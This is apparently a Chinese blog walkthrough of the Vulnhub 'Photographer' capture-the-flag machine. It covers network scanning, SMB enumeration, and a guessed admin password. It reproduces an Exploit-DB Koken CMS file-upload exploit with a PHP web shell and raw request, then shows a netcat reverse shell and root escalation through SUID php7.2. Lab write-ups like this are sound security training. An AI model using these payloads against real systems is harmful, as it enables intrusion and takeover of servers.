Photographer
识别目标主机IP地址
sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:6c:43:60 1 60 PCS Systemtechnik GmbH
192.168.56.226 08:00:27:04:ce:ca 1 60 PCS Systemtechnik GmbH
利用Kali Linux的netdiscover工具识别目标主机IP地址为192.168.56.226
NMAP扫描
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Photographer]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.226 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-22 00:35 EDT
Nmap scan report for bogon (192.168.56.226)
Host is up (0.00017s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Photographer by v1n1v131r4
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8000/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Koken API error
|_http-open-proxy: Proxy might be redirecting requests
MAC Address: 08:00:27:04:CE:CA (Oracle VirtualBox virtual NIC)
Service Info: Host: PHOTOGRAPHER
Host script results:
|_clock-skew: mean: 1h19m58s, deviation: 2h18m33s, median: -1s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-03-22T04:35:31
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: PHOTOGRAPHER, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: photographer
| NetBIOS computer name: PHOTOGRAPHER\x00
| Domain name: \x00
| FQDN: photographer
|_ System time: 2023-03-22T00:35:31-04:00
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.10 seconds
获得Shell
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Photographer]
└─$ smbclient -L 192.168.56.226
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
sambashare Disk Samba on Ubuntu
IPC$ IPC IPC Service (photographer server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP PHOTOGRAPHER
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Photographer]
└─$ smbclient //192.168.56.226/sambashare
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Jul 20 21:30:07 2020
.. D 0 Tue Jul 21 05:44:25 2020
mailsent.txt N 503 Mon Jul 20 21:29:40 2020
wordpress.bkp.zip N 13930308 Mon Jul 20 21:22:23 2020
278627392 blocks of size 1024. 264268400 blocks available
smb: \> get mailsent.txt
getting file \mailsent.txt of size 503 as mailsent.txt (14.9 KiloBytes/sec) (average 14.9 KiloBytes/sec)
smb: \> get wordpress.bkp.zip
getting file \wordpress.bkp.zip of size 13930308 as wordpress.bkp.zip (42511.9 KiloBytes/sec) (average 38539.1 KiloBytes/sec)
smb: \> put test.txt
NT_STATUS_ACCESS_DENIED opening remote file \test.txt
smb: \> pwd
Current directory is \\192.168.56.226\sambashare\
smb: \> quit
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Photographer]
└─$ ls
mailsent.txt nmap_full_scan test.txt wordpress.bkp.zip
(kali㉿kali)-[~/Desktop/Vulnhub/Photographer]
└─$ enum4linux 192.168.56.226
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\daisa (Local User)
S-1-22-1-1001 Unix User\agi (Local User)
识别2个用户名: daisa, agi
──(kali㉿kali)-[~/Desktop/Vulnhub/Photographer/wordpress]
└─$ curl http://192.168.56.226/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.18 (Ubuntu) Server at 192.168.56.226 Port 80</address>
</body></html>
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Photographer/wordpress]
└─$ curl http://192.168.56.226:8000/robots.txt
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Photographer/wordpress]
└─$ nikto -h http://192.168.56.226
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.226
+ Target Hostname: 192.168.56.226
+ Target Port: 80
+ Start Time: 2023-03-22 00:42:18 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Server may leak inodes via ETags, header found with file /, inode: 164f, size: 5aaf04d7cd1a0, mtime: gzip
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2023-03-22 00:43:24 (GMT-4) (66 seconds)
---------------------------------------------------------------------------
对8000端口源代码分析,知道CMS为koken,而且版本为 0.22.24
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Photographer]
└─$ searchsploit Koken
-------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------- ---------------------------------
Koken CMS 0.22.24 - Arbitrary File Upload (Authenticated) | php/webapps/48706.txt
-------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Photographer]
└─$ searchsploit -m php/webapps/48706.txt
Exploit: Koken CMS 0.22.24 - Arbitrary File Upload (Authenticated)
URL: https://www.exploit-db.com/exploits/48706
Path: /usr/share/exploitdb/exploits/php/webapps/48706.txt
File Type: ASCII text
Copied to: /home/kali/Desktop/Vulnhub/Photographer/48706.txt
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Photographer]
└─$ cat 48706.txt
# Exploit Title: Koken CMS 0.22.24 - Arbitrary File Upload (Authenticated)
# Date: 2020-07-15
# Exploit Author: v1n1v131r4
# Vendor Homepage: http://koken.me/
# Software Link: https://www.softaculous.com/apps/cms/Koken
# Version: 0.22.24
# Tested on: Linux
# PoC: https://github.com/V1n1v131r4/Bypass-File-Upload-on-Koken-CMS/blob/master/README.md
The Koken CMS upload restrictions are based on a list of allowed file extensions (withelist), which facilitates bypass through the handling of the HTTP request via Burp.
Steps to exploit:
1. Create a malicious PHP file with this content:
<?php system($_GET['cmd']);?>
2. Save as "image.php.jpg"
3. Authenticated, go to Koken CMS Dashboard, upload your file on "Import Content" button (Library panel) and send the HTTP request to Burp.
4. On Burp, rename your file to "image.php"
POST /koken/api.php?/content HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://target.com/koken/admin/
x-koken-auth: cookie
Content-Type: multipart/form-data; boundary=---------------------------2391361183188899229525551
Content-Length: 1043
Connection: close
Cookie: PHPSESSID= [Cookie value here]
-----------------------------2391361183188899229525551
Content-Disposition: form-data; name="name"
image.php
-----------------------------2391361183188899229525551
Content-Disposition: form-data; name="chunk"
0
-----------------------------2391361183188899229525551
Content-Disposition: form-data; name="chunks"
1
-----------------------------2391361183188899229525551
Content-Disposition: form-data; name="upload_session_start"
1594831856
-----------------------------2391361183188899229525551
Content-Disposition: form-data; name="visibility"
public
-----------------------------2391361183188899229525551
Content-Disposition: form-data; name="license"
all
-----------------------------2391361183188899229525551
Content-Disposition: form-data; name="max_download"
none
-----------------------------2391361183188899229525551
Content-Disposition: form-data; name="file"; filename="image.php"
Content-Type: image/jpeg
<?php system($_GET['cmd']);?>
-----------------------------2391361183188899229525551--
5. On Koken CMS Library, select you file and put the mouse on "Download File" to see where your file is hosted on server.
首先要找到管理员目录,nikto工具告知为/admin
──(kali㉿kali)-[~/Desktop/Vulnhub/Photographer]
└─$ nikto -h http://192.168.56.226:8000
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.226
+ Target Hostname: 192.168.56.226
+ Target Port: 8000
+ Start Time: 2023-03-22 00:42:41 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'x-koken-cache' found, with contents: hit
+ All CGI directories 'found', use '-C none' to test none
+ Server may leak inodes via ETags, header found with file /, inode: 1264, size: 5f775c3bf55a0, mtime: gzip
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Uncommon header 'x-xhr-current-location' found, with contents: http://192.168.56.226/
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3092: /app/: This might be interesting...
+ OSVDB-3092: /home/: This might be interesting...
下一步需要有管理员账户和密码
之前首页有daisa的名字,应该就是agi给daisa搭建的那个网站,邮箱应该就是[email protected],密码猜测是babygirl
成功登陆,然后利用文件上传漏洞
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Photographer]
└─$ vim shell.php
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Photographer]
└─$ mv shell.php shell.php.jpg
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Photographer]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.226] 59056
Linux photographer 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
01:09:04 up 36 min, 0 users, load average: 1.01, 2.98, 4.43
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@photographer:/$ cd /home
cd /home
www-data@photographer:/home$ ls -alh
ls -alh
total 32K
drwxr-xr-x 5 root root 4.0K Jul 20 2020 .
drwxr-xr-x 24 root root 4.0K Feb 28 2019 ..
drwxr-xr-x 17 agi agi 4.0K Jul 21 2020 agi
drwxr-xr-x 16 daisa daisa 4.0K Jul 20 2020 daisa
drwx------ 2 root root 16K Feb 28 2019 lost+found
www-data@photographer:/home$ cd daisa
cd daisa
www-data@photographer:/home/daisa$ ls -alh
ls -alh
total 112K
drwxr-xr-x 16 daisa daisa 4.0K Jul 20 2020 .
drwxr-xr-x 5 root root 4.0K Jul 20 2020 ..
-rw------- 1 daisa daisa 966 Jul 20 2020 .ICEauthority
-rw------- 1 daisa daisa 52 Jul 20 2020 .Xauthority
-rw-r--r-- 1 daisa daisa 220 Feb 28 2019 .bash_logout
-rw-r--r-- 1 daisa daisa 3.7K Feb 28 2019 .bashrc
drwx------ 11 daisa daisa 4.0K Jul 20 2020 .cache
drwx------ 3 daisa daisa 4.0K Feb 28 2019 .compiz
drwx------ 14 daisa daisa 4.0K Jul 20 2020 .config
-rw-r--r-- 1 daisa daisa 25 Feb 28 2019 .dmrc
drwx------ 2 daisa daisa 4.0K Jul 20 2020 .gconf
drwx------ 3 daisa daisa 4.0K Jul 20 2020 .gnupg
drwx------ 3 daisa daisa 4.0K Feb 28 2019 .local
-rw-r--r-- 1 daisa daisa 655 Feb 28 2019 .profile
-rw-r--r-- 1 daisa daisa 0 Jul 20 2020 .sudo_as_admin_successful
-rw------- 1 daisa daisa 681 Jul 20 2020 .xsession-errors
-rw------- 1 daisa daisa 1.7K Jul 20 2020 .xsession-errors.old
drwxr-xr-x 2 daisa daisa 4.0K Feb 28 2019 Desktop
drwxr-xr-x 2 daisa daisa 4.0K Feb 28 2019 Documents
drwxr-xr-x 2 daisa daisa 4.0K Feb 28 2019 Downloads
drwxr-xr-x 2 daisa daisa 4.0K Feb 28 2019 Music
drwxr-xr-x 2 daisa daisa 4.0K Feb 28 2019 Pictures
drwxr-xr-x 2 daisa daisa 4.0K Feb 28 2019 Public
drwxr-xr-x 2 daisa daisa 4.0K Feb 28 2019 Templates
drwxr-xr-x 2 daisa daisa 4.0K Feb 28 2019 Videos
-rw-r--r-- 1 daisa daisa 8.8K Feb 28 2019 examples.desktop
-rwxrwxr-x 1 root root 33 Jul 20 2020 user.txt
www-data@photographer:/home/daisa$ cat user.txt
cat user.txt
d41d8cd98f00b204e9800998ecf8427e
提权
www-data@photographer:/var/www/html/koken/admin$ find / -perm -4000 -type f 2>/dev/null
<www/html/koken/admin$ find / -perm -4000 -type f 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/oxide-qt/chrome-sandbox
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/sbin/pppd
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/php7.2
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/chfn
/bin/ping
/bin/fusermount
/bin/mount
/bin/ping6
/bin/umount
/bin/su
利用php7.2的SUID位进行提权
www-data@photographer:/tmp$ CMD="/bin/sh"
CMD="/bin/sh"
www-data@photographer:/tmp$ /usr/bin/php7.2 -r "pcntl_exec('/bin/sh', ['-p']);"
< /usr/bin/php7.2 -r "pcntl_exec('/bin/sh', ['-p']);"
cd /root
cd /root
ls -alh
ls -alh
# # total 44K
drwx------ 4 root root 4.0K Jul 21 2020 .
drwxr-xr-x 24 root root 4.0K Feb 28 2019 ..
-rw------- 1 root root 49 Jul 21 2020 .bash_history
-rw-r--r-- 1 root root 3.1K Oct 22 2015 .bashrc
drwx------ 2 root root 4.0K Feb 26 2019 .cache
-rw------- 1 root root 216 Jul 20 2020 .mysql_history
drwxr-xr-x 2 root root 4.0K Jul 20 2020 .nano
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw------- 1 root root 5.2K Jul 21 2020 .viminfo
-rw------- 1 root root 2.1K Jul 21 2020 proof.txt
# cat proof.txt
cat proof.txt
.:/://::::///:-`
-/++:+`:--:o: oo.-/+/:`
-++-.`o++s-y:/s: `sh:hy`:-/+:`
:o:``oyo/o`. ` ```/-so:+--+/`
-o:-`yh//. `./ys/-.o/
++.-ys/:/y- /s-:/+/:/o`
o/ :yo-:hNN .MNs./+o--s`
++ soh-/mMMN--.` `.-/MMMd-o:+ -s
.y /++:NMMMy-.`` ``-:hMMMmoss: +/
s- hMMMN` shyo+:. -/+syd+ :MMMMo h
h `MMMMMy./MMMMMd: +mMMMMN--dMMMMd s.
y `MMMMMMd`/hdh+..+/.-ohdy--mMMMMMm +-
h dMMMMd:```` `mmNh ```./NMMMMs o.
y. /MMMMNmmmmd/ `s-:o sdmmmmMMMMN. h`
:o sMMMMMMMMs. -hMMMMMMMM/ :o
s: `sMMMMMMMo - . `. . hMMMMMMN+ `y`
`s- +mMMMMMNhd+h/+h+dhMMMMMMd: `s-
`s: --.sNMMMMMMMMMMMMMMMMMMmo/. -s.
/o.`ohd:`.odNMMMMMMMMMMMMNh+.:os/ `/o`
.++-`+y+/:`/ssdmmNNmNds+-/o-hh:-/o-
./+:`:yh:dso/.+-++++ss+h++.:++-
-/+/-:-/y+/d:yh-o:+--/+/:`
`-///////////////:`
Follow me at: http://v1n1v131r4.com
d41d8cd98f00b204e9800998ecf8427e
#
拿到了root shell以及root flag
标签:Photographer,192.168,Jul,daisa,2020,Vulnhub,kali,靶机,root From: https://www.cnblogs.com/jason-huawen/p/17243383.html